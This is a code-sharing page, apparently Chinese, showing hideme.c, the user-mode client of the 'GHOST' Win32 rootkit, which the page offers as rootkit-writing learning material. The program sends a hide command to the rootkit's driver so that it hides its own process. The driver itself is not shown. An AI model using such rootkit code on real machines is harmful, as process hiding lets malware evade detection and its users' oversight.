📄 hideme.c

📁 名为 GHOST的Win32下的Rootkit源码, 是学习ROOTKIT编写入门的优秀学习材料.

💻 C

字号:

// HideMe
// Copyright Ric Vieler, 2006
// Send a hide command to MyDeviceDriver
// and wait for operator to stop the process
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#include "IoManager.h"

void main(int argc, char *argv[])
{
	HANDLE deviceHandle;
	GHOST_IOCTLDATA control = { 0 };
	ULONG status = 0;

	deviceHandle = CreateFile( GHOST_DEVICE_OPEN_NAME,
		GENERIC_READ | GENERIC_WRITE,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	if( deviceHandle == INVALID_HANDLE_VALUE )
	{
		printf ("Could not find MyDeviceDriver.\n");
	}
	else
	{  
		control.processId = GetCurrentProcessId();

		if( DeviceIoControl(	deviceHandle,
			GHOST_HIDE_COMMAND,
			&control,
			sizeof(control), // input
			(PVOID)&control,
			sizeof(control), // output
			&status,
			NULL ) )
			printf ("MyDeviceDriver hiding this process (0x%x).\n",
				control.processId );
		else
			printf ("DeviceIoControl failed.\n");

		CloseHandle(deviceHandle);
	}
	
	printf ("Press any key to terminate this process..." );
	getch();
	printf ("\n" );
}

💿 文件大小 83 K

👤 上传用户 Tonic2009

📂 所属分类其他

🏷️ 相关标签

#Rootkit #ROOTKIT #GHOST #Win

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -